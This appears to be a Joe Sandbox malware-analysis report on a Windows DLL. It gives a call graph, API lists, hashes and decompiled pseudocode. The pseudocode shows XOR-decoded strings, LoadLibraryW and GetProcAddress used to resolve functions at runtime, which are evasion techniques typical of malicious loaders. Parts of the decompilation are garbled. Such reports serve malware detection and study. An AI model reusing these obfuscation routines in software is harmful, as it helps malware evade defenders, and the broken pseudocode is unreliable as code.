2372 6a7c69 _abort 6 API calls 2366->2372 2367 6d15b0 _abort 6 API calls 2370 6c5a2d 2367->2370 2368->2367 2371 6c58e4 2369->2371 2373 6c5aa3 2370->2373 2376 6c5a46 GetConsoleMode 2370->2376 2374 6c6c17 _free 2 API calls 2371->2374 2390 6c58bf __dosmaperr 2372->2390 2375 6c5aa7 ReadFile 2373->2375 2377 6c58eb 2374->2377 2378 6c5b1b GetLastError 2375->2378 2379 6c5ac1 2375->2379 2376->2373 2380 6c5a57 2376->2380 2384 6c50a6 _abort 8 API calls 2377->2384 2377->2390 2378->2390 2379->2378 2381 6c5a98 2379->2381 2380->2375 2382 6c5a5d ReadConsoleW 2380->2382 2386 6c5afd 2381->2386 2387 6c5ae6 2381->2387 2381->2390 2382->2381 2385 6c5a79 GetLastError 2382->2385 2383 6c6c17 _free 2 API calls 2383->2358 2384->2368 2385->2390 2386->2390 2417 6c531b 2386->2417 2409 6c54db 2387->2409 2390->2383 2392 6c6c5e 2391->2392 2393 6c6c89 HeapAlloc 2392->2393 2395 6c6c72 _abort 2392->2395 2396 6c6c9e __dosmaperr 2392->2396 2394 6c6c9c 2393->2394 2393->2395 2394->2396 2395->2393 2395->2396 2397 6cce6b _abort EnterCriticalSection 2395->2397 2396->2342 2397->2395 2399 6c6dba _abort GetProcAddress 2398->2399 2400 6c7663 2399->2400 2400->2336 2402 6b337e 2401->2402 2403 6b33a2 2401->2403 2404 6b338d 2402->2404 2405 6b3384 CloseHandle 2402->2405 2403->2323 2406 6b339c 2404->2406 2407 6b3393 FreeLibrary 2404->2407 2405->2404 2408 6c6c17 _free 2 API calls 2406->2408 2407->2406 2408->2403 2422 6c51c4 2409->2422 2412 6c55f4 GetLastError 2413 6c5523 __dosmaperr 2412->2413 2413->2390 2415 6c5536 MultiByteToWideChar 2415->2412 2415->2413 2416 6c50a6 _abort 8 API calls 2416->2415 2420 6c5353 2417->2420 2418 6c54ab 2418->2390 2419 6c53e3 ReadFile 2419->2420 2420->2418 2420->2419 2421 6c50a6 _abort 8 API calls 2420->2421 2421->2420 2424 6c51f9 2422->2424 2423 6c52ef 2423->2413 2423->2415 2423->2416 2424->2423 2425 6c525f ReadFile 2424->2425 2426 6c50a6 _abort 8 API calls 2424->2426 2425->2424 2426->2424
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 100015B4
                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 100015C5
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 10001772
                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 1000178E
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 10001949
                                                                                        • GetCurrentProcess.KERNEL32(00000000), ref: 10001955
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CurrentHandleInfoLibraryLoadModuleNativeProcessSystem
                                                                                        • String ID: 2.!&76F$kernel32.dll
                                                                                        • API String ID: 2205852423-2406019442
                                                                                        • Opcode ID: 9cc3cfd92049a61f91d9eae1520d9b53233dc92f581e031689f8da80675119ac
                                                                                        • Instruction ID: ad7fdbeabc2d8b959a0ce412821851c4b4e789d75f96b5e85371e0ed602a81a3
                                                                                        • Opcode Fuzzy Hash: 9cc3cfd92049a61f91d9eae1520d9b53233dc92f581e031689f8da80675119ac
                                                                                        • Instruction Fuzzy Hash: 04A1E326D256994BF703DB7988421D9F3A4AFAB2C5B54C31BF80072566FB30A7C28740
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 37%
                                                                                        			E10001DD0(void* __ebx, intOrPtr __ecx, void* __edi) {
                                                                                        				intOrPtr* _v4;
                                                                                        				signed int _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v24;
                                                                                        				signed int _v32;
                                                                                        				short _v48;
                                                                                        				char _v52;
                                                                                        				char _v56;
                                                                                        				char _v76;
                                                                                        				signed int _v80;
                                                                                        				signed int _v84;
                                                                                        				char _v100;
                                                                                        				signed int _v104;
                                                                                        				signed int _v108;
                                                                                        				signed int* _v124;
                                                                                        				short _v128;
                                                                                        				short _v152;
                                                                                        				signed int _v156;
                                                                                        				struct HINSTANCE__* _v160;
                                                                                        				signed int _v164;
                                                                                        				signed int _v168;
                                                                                        				intOrPtr _v172;
                                                                                        				signed int _v176;
                                                                                        				intOrPtr _v180;
                                                                                        				signed int _v212;
                                                                                        				signed int _v224;
                                                                                        				unsigned int _v240;
                                                                                        				intOrPtr _v252;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t185;
                                                                                        				signed int _t186;
                                                                                        				short _t188;
                                                                                        				struct HINSTANCE__* _t199;
                                                                                        				_Unknown_base(*)()* _t212;
                                                                                        				short _t214;
                                                                                        				intOrPtr _t224;
                                                                                        				intOrPtr _t230;
                                                                                        				char _t231;
                                                                                        				short _t232;
                                                                                        				intOrPtr _t241;
                                                                                        				signed int _t242;
                                                                                        				signed int _t243;
                                                                                        				signed int* _t244;
                                                                                        				signed int _t249;
                                                                                        				signed int _t256;
                                                                                        				void* _t262;
                                                                                        				void* _t263;
                                                                                        				signed int _t264;
                                                                                        				signed int _t267;
                                                                                        				signed int _t269;
                                                                                        				signed int _t274;
                                                                                        				void* _t275;
                                                                                        				signed int _t277;
                                                                                        				signed int _t281;
                                                                                        				void* _t285;
                                                                                        				char _t289;
                                                                                        				short _t294;
                                                                                        				signed int _t303;
                                                                                        				signed int _t307;
                                                                                        				signed int _t308;
                                                                                        				signed int _t310;
                                                                                        				signed int _t320;
                                                                                        				signed int _t324;
                                                                                        				signed int _t335;
                                                                                        				signed int _t336;
                                                                                        				signed int _t337;
                                                                                        				signed int _t340;
                                                                                        				char _t341;
                                                                                        				intOrPtr* _t344;
                                                                                        				intOrPtr* _t348;
                                                                                        				void* _t354;
                                                                                        				signed int _t356;
                                                                                        				signed int* _t357;
                                                                                        				signed int _t358;
                                                                                        				unsigned int _t359;
                                                                                        				signed int _t360;
                                                                                        				void* _t361;
                                                                                        				signed int _t362;
                                                                                        				void* _t364;
                                                                                        				signed int _t369;
                                                                                        				signed int _t370;
                                                                                        				signed short* _t371;
                                                                                        				void* _t381;
                                                                                        				intOrPtr* _t382;
                                                                                        				intOrPtr* _t386;
                                                                                        				signed int _t389;
                                                                                        				void* _t390;
                                                                                        				signed int _t393;
                                                                                        				intOrPtr* _t396;
                                                                                        				intOrPtr* _t400;
                                                                                        				signed int _t401;
                                                                                        				signed int _t402;
                                                                                        				signed int _t405;
                                                                                        				signed int _t407;
                                                                                        				signed int _t409;
                                                                                        				signed int _t413;
                                                                                        				signed int _t415;
                                                                                        				void* _t416;
                                                                                        				signed int _t417;
                                                                                        				char _t418;
                                                                                        				signed int* _t419;
                                                                                        				signed int _t421;
                                                                                        				unsigned int _t423;
                                                                                        				signed int _t426;
                                                                                        				void* _t428;
                                                                                        				signed int _t430;
                                                                                        				void* _t431;
                                                                                        				intOrPtr _t432;
                                                                                        				signed short _t433;
                                                                                        				signed int _t434;
                                                                                        				signed int _t438;
                                                                                        				void* _t440;
                                                                                        				void* _t442;
                                                                                        				signed int _t447;
                                                                                        				signed int _t450;
                                                                                        				void* _t451;
                                                                                        				void* _t489;
                                                                                        
                                                                                        				_t320 = _t447;
                                                                                        				_t450 = (_t447 - 0x00000008 & 0xfffffff0) + 4;
                                                                                        				_v8 =  *((intOrPtr*)(_t320 + 4));
                                                                                        				_t438 = _t450;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E10012A80);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_push(_t320);
                                                                                        				_t451 = _t450 - 0x98;
                                                                                        				_t185 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_t186 = _t185 ^ _t438;
                                                                                        				_v32 = _t186;
                                                                                        				_push(_t186);
                                                                                        				 *[fs:0x0] =  &_v24;
                                                                                        				_v180 = __ecx;
                                                                                        				asm("movups xmm0, [0x1001899c]");
                                                                                        				_t188 =  *0x100189b4; // 0x44
                                                                                        				_t413 = 0;
                                                                                        				_t405 =  *0x1001aba8; // 0x5
                                                                                        				_v128 = _t188;
                                                                                        				asm("movups [ebp-0x8c], xmm0");
                                                                                        				asm("movq xmm0, [0x100189ac]");
                                                                                        				asm("movq [ebp-0x7c], xmm0");
                                                                                        				if(_t405 >= 2) {
                                                                                        					asm("movaps xmm2, [0x100189f0]");
                                                                                        					_t413 = 8;
                                                                                        					asm("movaps xmm4, [0x10018a70]");
                                                                                        					asm("movaps xmm1, xmm2");
                                                                                        					asm("punpckldq xmm1, xmm2");
                                                                                        					asm("movaps xmm0, xmm2");
                                                                                        					asm("punpckhdq xmm0, xmm2");
                                                                                        					asm("pmuldq xmm0, xmm4");
                                                                                        					asm("pmuldq xmm1, xmm4");
                                                                                        					asm("shufps xmm1, xmm0, 0xdd");
                                                                                        					asm("paddd xmm1, xmm2");
                                                                                        					asm("movd xmm5, eax");
                                                                                        					asm("psrad xmm1, xmm5");
                                                                                        					asm("movd xmm6, ecx");
                                                                                        					asm("movaps xmm0, xmm1");
                                                                                        					asm("psrld xmm0, xmm6");
                                                                                        					asm("paddd xmm0, xmm1");
                                                                                        					asm("pmulld xmm0, [0x10018a20]");
                                                                                        					asm("psubd xmm2, xmm0");
                                                                                        					asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        					asm("movaps xmm2, [0x10018a00]");
                                                                                        					asm("paddd xmm2, [0x100189f0]");
                                                                                        					asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        					asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        					asm("paddw xmm1, [0x10018a30]");
                                                                                        					asm("movq xmm0, [eax]");
                                                                                        					asm("pxor xmm1, xmm0");
                                                                                        					asm("movaps xmm0, xmm2");
                                                                                        					asm("movq [ebp-0x8c], xmm1");
                                                                                        					asm("movaps xmm1, xmm2");
                                                                                        					asm("punpckhdq xmm0, xmm2");
                                                                                        					asm("punpckldq xmm1, xmm2");
                                                                                        					asm("pmuldq xmm0, xmm4");
                                                                                        					asm("pmuldq xmm1, xmm4");
                                                                                        					asm("shufps xmm1, xmm0, 0xdd");
                                                                                        					asm("paddd xmm1, xmm2");
                                                                                        					asm("psrad xmm1, xmm5");
                                                                                        					asm("movaps xmm0, xmm1");
                                                                                        					asm("psrld xmm0, xmm6");
                                                                                        					asm("paddd xmm0, xmm1");
                                                                                        					asm("pmulld xmm0, [0x10018a20]");
                                                                                        					asm("psubd xmm2, xmm0");
                                                                                        					asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        					asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        					asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        					asm("movq xmm0, [ebp-0x84]");
                                                                                        					asm("paddw xmm1, [0x10018a30]");
                                                                                        					asm("pxor xmm1, xmm0");
                                                                                        					asm("movq [ebp-0x84], xmm1");
                                                                                        				}
                                                                                        				do {
                                                                                        					 *(_t438 + _t413 * 2 - 0x8c) =  *(_t438 + _t413 * 2 - 0x8c) ^ _t413 + (8 - 0x00000001 - ((0x92492493 * _t413 >> 0x00000020) + _t413 >> 0x00000005 >> 0x0000001f) + ((0x92492493 * _t413 >> 0x00000020) + _t413 >> 0x00000005)) * 0x00000008;
                                                                                        					_t413 = _t413 + 1;
                                                                                        				} while (_t413 < 0xd);
                                                                                        				_t199 = LoadLibraryW( &_v152); // executed
                                                                                        				_v160 = _t199;
                                                                                        				if(_t199 == 0) {
                                                                                        					L53:
                                                                                        					 *[fs:0x0] = _v24;
                                                                                        					__eflags = _v32 ^ _t438;
                                                                                        					return E1000296F(_v32 ^ _t438);
                                                                                        				} else {
                                                                                        					_t335 =  *0x10018994; // 0x2c24203a
                                                                                        					asm("movups xmm0, [0x10018984]");
                                                                                        					_v84 = _t335;
                                                                                        					_t336 =  *0x10018998; // 0x4c
                                                                                        					_v80 = _t336;
                                                                                        					_t337 = 0;
                                                                                        					_v156 = 0;
                                                                                        					asm("movups [ebp-0x58], xmm0");
                                                                                        					if(_t405 < 2) {
                                                                                        						L9:
                                                                                        						_t340 = _v156;
                                                                                        						 *(_t438 + _t340 - 0x58) =  *(_t438 + _t340 - 0x58) ^ 0x00000001;
                                                                                        						_t337 = _t340 + 1;
                                                                                        						_v156 = _t337;
                                                                                        					} else {
                                                                                        						asm("movaps xmm0, [0x10018a60]");
                                                                                        						asm("movaps xmm4, [0x100189f0]");
                                                                                        						asm("movaps xmm3, [0x10018a70]");
                                                                                        						asm("movaps xmm6, [0x10018a20]");
                                                                                        						asm("movd xmm5, eax");
                                                                                        						asm("movaps [ebp-0x40], xmm0");
                                                                                        						asm("movd xmm7, eax");
                                                                                        						do {
                                                                                        							asm("movd xmm0, ecx");
                                                                                        							asm("pshufd xmm2, xmm0, 0x0");
                                                                                        							asm("paddd xmm2, xmm4");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm3");
                                                                                        							asm("pmuldq xmm1, xmm3");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm7");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, xmm6");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("pand xmm1, [0x10018a40]");
                                                                                        							asm("packuswb xmm1, xmm1");
                                                                                        							asm("movd xmm0, edx");
                                                                                        							asm("paddb xmm1, xmm0");
                                                                                        							asm("movd xmm0, dword [ebp+ecx-0x58]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movd xmm0, eax");
                                                                                        							asm("pshufd xmm2, xmm0, 0x0");
                                                                                        							asm("movd [ebp+ecx-0x58], xmm1");
                                                                                        							asm("paddd xmm2, xmm4");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm3");
                                                                                        							asm("pmuldq xmm1, xmm3");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm7");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, xmm6");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("pand xmm1, [0x10018a40]");
                                                                                        							asm("packuswb xmm1, xmm1");
                                                                                        							asm("movd xmm0, edx");
                                                                                        							asm("paddb xmm1, xmm0");
                                                                                        							asm("movd xmm0, dword [ebp+ecx-0x54]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movd [ebp+ecx-0x54], xmm1");
                                                                                        							_t337 = _t337 + 8;
                                                                                        						} while (_t337 < 0x10);
                                                                                        						_v156 = _t337;
                                                                                        						while(_t337 < 0x15) {
                                                                                        							goto L9;
                                                                                        						}
                                                                                        					}
                                                                                        					_t212 = GetProcAddress(_v160,  &_v100);
                                                                                        					_v156 = _t212;
                                                                                        					if(_t212 == 0) {
                                                                                        						L52:
                                                                                        						FreeLibrary(_v160); // executed
                                                                                        						goto L53;
                                                                                        					} else {
                                                                                        						asm("movups xmm0, [0x10018964]");
                                                                                        						_t214 =  *0x10018980; // 0x46
                                                                                        						_t415 = 0;
                                                                                        						_t341 =  *0x1001897c; // 0x600003
                                                                                        						_v52 = _t341;
                                                                                        						_v48 = _t214;
                                                                                        						asm("movups [ebp-0x40], xmm0");
                                                                                        						asm("movq xmm0, [0x10018974]");
                                                                                        						asm("movq [ebp-0x30], xmm0");
                                                                                        						if(_t405 >= 2) {
                                                                                        							asm("movaps xmm2, [0x100189f0]");
                                                                                        							asm("movaps xmm4, [0x10018a70]");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							_t415 = 8;
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("movd xmm5, eax");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("movd xmm6, eax");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x10018a20]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("movaps xmm2, [0x10018a00]");
                                                                                        							asm("paddd xmm2, [0x100189f0]");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [0x10018a30]");
                                                                                        							asm("paddw xmm1, xmm0");
                                                                                        							asm("movq xmm0, [eax]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("movq [ebp-0x40], xmm1");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm4");
                                                                                        							asm("pmuldq xmm1, xmm4");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm6");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, [0x10018a20]");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [0x10018a30]");
                                                                                        							asm("paddw xmm1, xmm0");
                                                                                        							asm("movq xmm0, [ebp-0x38]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movq [ebp-0x38], xmm1");
                                                                                        						}
                                                                                        						do {
                                                                                        							 *(_t438 + _t415 * 2 - 0x40) =  *(_t438 + _t415 * 2 - 0x40) ^ _t415 + (8 - 0x00000001 - ((0x92492493 * _t415 >> 0x00000020) + _t415 >> 0x00000005 >> 0x0000001f) + ((0x92492493 * _t415 >> 0x00000020) + _t415 >> 0x00000005)) * 0x00000008;
                                                                                        							_t415 = _t415 + 1;
                                                                                        						} while (_t415 < 0xf);
                                                                                        						_v108 = 0;
                                                                                        						_t344 =  &_v76;
                                                                                        						_v104 = 7;
                                                                                        						_v124 = 0;
                                                                                        						_t381 = _t344 + 2;
                                                                                        						do {
                                                                                        							_t224 =  *_t344;
                                                                                        							_t344 = _t344 + 2;
                                                                                        						} while (_t224 != 0);
                                                                                        						L79();
                                                                                        						_v16 = 0;
                                                                                        						_t227 =  >=  ? _v124 :  &_v124;
                                                                                        						_t382 = _v156( >=  ? _v124 :  &_v124,  &_v76, _t344 - _t381 >> 1);
                                                                                        						_v84 = 0;
                                                                                        						_t348 = _t382;
                                                                                        						_v80 = 7;
                                                                                        						_v100 = 0;
                                                                                        						_t73 = _t348 + 2; // 0x2
                                                                                        						_t416 = _t73;
                                                                                        						do {
                                                                                        							_t230 =  *_t348;
                                                                                        							_t348 = _t348 + 2;
                                                                                        						} while (_t230 != 0);
                                                                                        						_push(_t348 - _t416 >> 1);
                                                                                        						_push(_t382);
                                                                                        						L79();
                                                                                        						_v16 = 1;
                                                                                        						_t417 = 0;
                                                                                        						_t231 =  *0x1001895c; // 0x80009
                                                                                        						_v52 = _t231;
                                                                                        						_t232 =  *0x10018960; // 0x3a
                                                                                        						_v48 = _t232;
                                                                                        						do {
                                                                                        							 *(_t438 + _t417 * 2 - 0x28) =  *(_t438 + _t417 * 2 - 0x28) ^ _t417 + (8 - 0x00000001 - ((0x92492493 * _t417 >> 0x00000020) + _t417 >> 0x00000005 >> 0x0000001f) + ((0x92492493 * _t417 >> 0x00000020) + _t417 >> 0x00000005)) * 0x00000008;
                                                                                        							_t417 = _t417 + 1;
                                                                                        						} while (_t417 < 3);
                                                                                        						_t386 =  &_v52;
                                                                                        						_t354 = _t386 + 2;
                                                                                        						do {
                                                                                        							_t241 =  *_t386;
                                                                                        							_t386 = _t386 + 2;
                                                                                        						} while (_t241 != 0);
                                                                                        						_t418 = _v100;
                                                                                        						_t242 = _v84;
                                                                                        						_t388 = _t386 - _t354 >> 1;
                                                                                        						_v168 = _t388;
                                                                                        						_t356 =  >=  ? _t418 :  &_v100;
                                                                                        						_v176 = _t356;
                                                                                        						if(_t388 <= _t242) {
                                                                                        							if(_t388 == 0) {
                                                                                        								L38:
                                                                                        								_t294 =  *0x10018958; // 0x3c
                                                                                        								_t430 = 0;
                                                                                        								asm("movq xmm0, [0x10018950]");
                                                                                        								_v48 = _t294;
                                                                                        								asm("movq [ebp-0x2c], xmm0");
                                                                                        								do {
                                                                                        									 *(_t438 + _t430 * 2 - 0x2c) =  *(_t438 + _t430 * 2 - 0x2c) ^ _t430 + (8 - 0x00000001 - ((0x92492493 * _t430 >> 0x00000020) + _t430 >> 0x00000005 >> 0x0000001f) + ((0x92492493 * _t430 >> 0x00000020) + _t430 >> 0x00000005)) * 0x00000008;
                                                                                        									_t430 = _t430 + 1;
                                                                                        									__eflags = _t430 - 5;
                                                                                        								} while (_t430 < 5);
                                                                                        								_t400 =  &_v56;
                                                                                        								_t431 = _t400 + 2;
                                                                                        								do {
                                                                                        									_t303 =  *_t400;
                                                                                        									_t400 = _t400 + 2;
                                                                                        									__eflags = _t303;
                                                                                        								} while (_t303 != 0);
                                                                                        								_t401 = _t400 - _t431;
                                                                                        								__eflags = _t401;
                                                                                        								_t388 = _t401 >> 1;
                                                                                        								_push(_t401 >> 1);
                                                                                        								_push( &_v56);
                                                                                        								L79();
                                                                                        							} else {
                                                                                        								_t432 = _t356 + (_t242 - _t388 + 1) * 2;
                                                                                        								_t307 = _t356;
                                                                                        								_v172 = _t432;
                                                                                        								while(1) {
                                                                                        									_t405 = 0;
                                                                                        									_t433 = _v52;
                                                                                        									_t369 = _t432 - _t307;
                                                                                        									_t370 = _t369 >> 1;
                                                                                        									if(_t369 == 0) {
                                                                                        										goto L30;
                                                                                        									}
                                                                                        									if( *_t307 == _t433) {
                                                                                        										L29:
                                                                                        										_t405 = _t307;
                                                                                        									} else {
                                                                                        										while(_t370 != 1) {
                                                                                        											_t307 = _t307 + 2;
                                                                                        											_t370 = _t370 - 1;
                                                                                        											if( *_t307 != _t433) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												goto L29;
                                                                                        											}
                                                                                        											goto L30;
                                                                                        										}
                                                                                        									}
                                                                                        									L30:
                                                                                        									_t308 = _t405;
                                                                                        									_v164 = _t308;
                                                                                        									if(_t308 != 0) {
                                                                                        										_t405 = _t388;
                                                                                        										_t434 = _t433 & 0x0000ffff;
                                                                                        										_t388 =  *_t308 & 0x0000ffff;
                                                                                        										_t371 =  &_v52;
                                                                                        										if(_t388 < _t434) {
                                                                                        											L36:
                                                                                        											_t388 = _v168;
                                                                                        											_t307 = _t308 + 2;
                                                                                        											_t432 = _v172;
                                                                                        											continue;
                                                                                        										} else {
                                                                                        											_v156 = _t308;
                                                                                        											_v156 = _v156 - _t371;
                                                                                        											_t489 = _t388 - _t434;
                                                                                        											_t308 = _v164;
                                                                                        											while(_t489 <= 0) {
                                                                                        												if(_t405 == 1) {
                                                                                        													_t310 = _t308 - _v176;
                                                                                        													__eflags = _t310;
                                                                                        													if(_t310 >= 0) {
                                                                                        														goto L38;
                                                                                        													}
                                                                                        												} else {
                                                                                        													_t402 = _v156;
                                                                                        													_t371 =  &(_t371[1]);
                                                                                        													_t405 = _t405 - 1;
                                                                                        													_t388 =  *(_t371 + _t402) & 0x0000ffff;
                                                                                        													if(( *(_t371 + _t402) & 0x0000ffff) >= ( *_t371 & 0x0000ffff)) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														goto L36;
                                                                                        													}
                                                                                        												}
                                                                                        												goto L43;
                                                                                        											}
                                                                                        											goto L36;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L43;
                                                                                        								}
                                                                                        							}
                                                                                        							L43:
                                                                                        							_t418 = _v100;
                                                                                        						}
                                                                                        						_t243 = _v80;
                                                                                        						__eflags = _t243 - 8;
                                                                                        						if(_t243 < 8) {
                                                                                        							L48:
                                                                                        							_t389 = _v104;
                                                                                        							__eflags = _t389 - 8;
                                                                                        							if(_t389 < 8) {
                                                                                        								goto L52;
                                                                                        							} else {
                                                                                        								_t357 = _v124;
                                                                                        								_t390 = 2 + _t389 * 2;
                                                                                        								_t244 = _t357;
                                                                                        								__eflags = _t390 - 0x1000;
                                                                                        								if(_t390 < 0x1000) {
                                                                                        									L51:
                                                                                        									_push(_t390);
                                                                                        									E10002980(_t357);
                                                                                        									goto L52;
                                                                                        								} else {
                                                                                        									_t357 =  *(_t357 - 4);
                                                                                        									_t390 = _t390 + 0x23;
                                                                                        									__eflags = _t244 - _t357 + 0xfffffffc - 0x1f;
                                                                                        									if(__eflags > 0) {
                                                                                        										goto L55;
                                                                                        									} else {
                                                                                        										goto L51;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t364 = 2 + _t243 * 2;
                                                                                        							_t289 = _t418;
                                                                                        							__eflags = _t364 - 0x1000;
                                                                                        							if(_t364 < 0x1000) {
                                                                                        								L47:
                                                                                        								_push(_t364);
                                                                                        								E10002980(_t418);
                                                                                        								_t451 = _t451 + 8;
                                                                                        								goto L48;
                                                                                        							} else {
                                                                                        								_t418 =  *(_t418 - 4);
                                                                                        								_t357 = _t364 + 0x23;
                                                                                        								__eflags = _t289 - _t418 + 0xfffffffc - 0x1f;
                                                                                        								if(__eflags > 0) {
                                                                                        									E100061DF(_t320, _t357, _t388, _t405, __eflags);
                                                                                        									L55:
                                                                                        									E100061DF(_t320, _t357, _t390, _t405, __eflags);
                                                                                        									asm("int3");
                                                                                        									_push(_t418);
                                                                                        									_t419 = _t357;
                                                                                        									_t249 =  *_t419;
                                                                                        									__eflags = _t249;
                                                                                        									if(_t249 == 0) {
                                                                                        										L61:
                                                                                        										return _t249;
                                                                                        									} else {
                                                                                        										_t393 = _t419[2] - _t249 & 0xfffffffe;
                                                                                        										__eflags = _t393 - 0x1000;
                                                                                        										if(_t393 < 0x1000) {
                                                                                        											L60:
                                                                                        											_push(_t393);
                                                                                        											_t249 = E10002980(_t249);
                                                                                        											 *_t419 = 0;
                                                                                        											_t419[1] = 0;
                                                                                        											_t419[2] = 0;
                                                                                        											goto L61;
                                                                                        										} else {
                                                                                        											_t358 =  *(_t249 - 4);
                                                                                        											_t393 = _t393 + 0x23;
                                                                                        											__eflags = _t249 - _t358 + 0xfffffffc - 0x1f;
                                                                                        											if(__eflags > 0) {
                                                                                        												E100061DF(_t320, _t358, _t393, _t405, __eflags);
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												asm("int3");
                                                                                        												_push(_t438);
                                                                                        												_t440 = _t451;
                                                                                        												_push(_t419);
                                                                                        												_t421 = _v212;
                                                                                        												_push(_t405);
                                                                                        												_t407 = _t358;
                                                                                        												 *_t407 = 0;
                                                                                        												 *(_t407 + 4) = 0;
                                                                                        												 *(_t407 + 8) = 0;
                                                                                        												__eflags = _t421;
                                                                                        												if(_t421 == 0) {
                                                                                        													L75:
                                                                                        													return _t407;
